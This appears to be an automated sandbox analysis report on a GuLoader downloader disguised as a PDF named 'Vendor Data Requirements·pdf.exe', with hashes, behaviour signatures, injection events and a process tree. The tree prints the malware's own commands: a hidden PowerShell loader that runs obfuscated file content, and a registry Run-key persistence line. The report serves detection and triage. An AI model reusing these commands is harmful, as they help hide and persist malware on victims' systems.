Analysis
max time kernel: 95s
max time network: 101s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 09-07-2024 09:49
Static task: static1
Behavioral task: behavioral1
  Sample: Vendor Data Requirements·pdf.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: Vendor Data Requirements·pdf.exe
  Resource: win10v2004-20240704-en
General
Target: Vendor Data Requirements·pdf.exe
Size: 401KB
MD5: f1043033237fa935ef9af72415e657a1
SHA1: b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
SHA256: a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
SHA512: 1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
SSDEEP: 6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Runs PowerShell with the display window hidden.
Adds Run key to start application (2 TTPs, 1 IoCs)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" | reg.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)

Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes:
  pid | process
  2752 | wab.exe
  2752 | wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
  pid | process
  2380 | powershell.exe
  2752 | wab.exe

Suspicious use of SetThreadContext (1 IoCs)
Processes:
  description | pid | process | target process
  PID 2380 set thread context of 2752 | 2380 | powershell.exe | wab.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Modifies registry key (1 TTPs, 1 IoCs)

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
  pid | process
  2380 | powershell.exe
  2380 | powershell.exe
  2380 | powershell.exe
  2380 | powershell.exe
  2380 | powershell.exe
  2380 | powershell.exe
  2380 | powershell.exe
  2380 | powershell.exe

Suspicious behavior: MapViewOfSection (1 IoCs)
Processes:
  pid | process
  2380 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2380 | powershell.exe

Suspicious use of WriteProcessMemory (18 IoCs)
Processes:
  description | pid | process | target process
  PID 2488 wrote to memory of 2380 | 2488 | Vendor Data Requirements·pdf.exe | powershell.exe
  PID 2488 wrote to memory of 2380 | 2488 | Vendor Data Requirements·pdf.exe | powershell.exe
  PID 2488 wrote to memory of 2380 | 2488 | Vendor Data Requirements·pdf.exe | powershell.exe
  PID 2488 wrote to memory of 2380 | 2488 | Vendor Data Requirements·pdf.exe | powershell.exe
  PID 2380 wrote to memory of 2752 | 2380 | powershell.exe | wab.exe
  PID 2380 wrote to memory of 2752 | 2380 | powershell.exe | wab.exe
  PID 2380 wrote to memory of 2752 | 2380 | powershell.exe | wab.exe
  PID 2380 wrote to memory of 2752 | 2380 | powershell.exe | wab.exe
  PID 2380 wrote to memory of 2752 | 2380 | powershell.exe | wab.exe
  PID 2380 wrote to memory of 2752 | 2380 | powershell.exe | wab.exe
  PID 2752 wrote to memory of 1720 | 2752 | wab.exe | cmd.exe
  PID 2752 wrote to memory of 1720 | 2752 | wab.exe | cmd.exe
  PID 2752 wrote to memory of 1720 | 2752 | wab.exe | cmd.exe
  PID 2752 wrote to memory of 1720 | 2752 | wab.exe | cmd.exe
  PID 1720 wrote to memory of 1912 | 1720 | cmd.exe | reg.exe
  PID 1720 wrote to memory of 1912 | 1720 | cmd.exe | reg.exe
  PID 1720 wrote to memory of 1912 | 1720 | cmd.exe | reg.exe
  PID 1720 wrote to memory of 1912 | 1720 | cmd.exe | reg.exe
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Vendor Data Requirements·pdf.exe"
  PID: 2488
  Signatures:
    - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
    PID: 2380
    Signatures:
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    Level 3: C:\Program Files (x86)\windows mail\wab.exe
      Command line: "C:\Program Files (x86)\windows mail\wab.exe"
      PID: 2752
      Signatures:
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of WriteProcessMemory

      Level 4: C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
        PID: 1720
        Signatures:
          - Suspicious use of WriteProcessMemory

        Level 5: C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
          PID: 1912
          Signatures:
            - Adds Run key to start application
            - Modifies registry key
Network
MITRE ATT&CK Enterprise v15
Downloads
Download 1
  Filesize: 350KB
  MD5: be381f7baf52513e52dfed9361a6dc69
  SHA1: a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
  SHA256: caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
  SHA512: c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a

Download 2
  Filesize: 69KB
  MD5: 8172795f7c8cfb7cc597e879d2b0b468
  SHA1: 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
  SHA256: 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
  SHA512: 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322